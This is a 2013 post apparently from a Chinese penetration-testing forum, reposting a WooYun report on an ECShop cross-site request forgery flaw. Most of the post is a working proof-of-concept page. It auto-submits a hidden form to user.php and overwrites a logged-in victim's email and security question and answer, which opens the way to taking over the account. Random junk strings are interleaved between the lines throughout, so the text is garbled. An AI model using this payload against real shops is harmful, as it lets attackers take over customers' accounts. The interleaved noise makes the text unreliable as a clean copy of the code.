中国网络渗透测试联盟
标题:
ecshop修改任意用户密码漏洞的CSRF利用
[打印本页]
作者:
admin
时间:
2013-2-20 08:30
标题:
ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
8 \% P% I& X$ _4 _ r5 e! y) J
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
: E+ x2 c. ]4 n
n+ G# g" K% I3 a/ l
Demo For:
http://www.wooyun.org/bug.php?action=view&id=395
+ t4 q' X0 F ?8 d) |/ Z
6 |2 o' b9 l6 M$ `& J4 D5 r4 \
详细说明:
' u7 y' x+ c: a( w' ]) t+ J% _
利用csrf和xss可以突破官方所说的“障碍”
& b2 a6 @4 b O
xss版本已经有人说明
* d5 g: |* ]+ F2 {4 p2 |
这里给出csrf版本
6 M9 n; ?' q* `1 d$ i
% o9 L$ P3 e7 d# j- ~
漏洞证明:
) I/ t1 a& N' n5 K2 |) l
<html>
: A! A3 e8 B, S6 a6 D+ Y' g
<body>
- B/ f- c3 ]1 N3 U6 k0 o
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
* Y, D" o; p8 J7 V. f
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
: d: z: B: l& R9 {& s- B J
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
, T" M" F' W( Q8 M3 O* l* K# J
<INPUT TYPE="text" NAME="sel_question" value="ecshop">
' ~; q D2 B& @
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
0 n; J/ h* X7 g9 X/ q( U$ C* ~0 F
</body>
' J3 o) u" F, t
<script>
( }/ P* }* o. d5 d2 N) V$ z
document.forms[0].submit();
' [# F9 w4 E+ |% B* j% Z
</script>
6 \, r: |' ]) C: Q' K7 w& r
</html>
- I+ z M$ v8 W5 \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
$ M3 ]; W5 J+ F. @/ M2 V! w
) z ]" m7 b# d+ x2 L
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2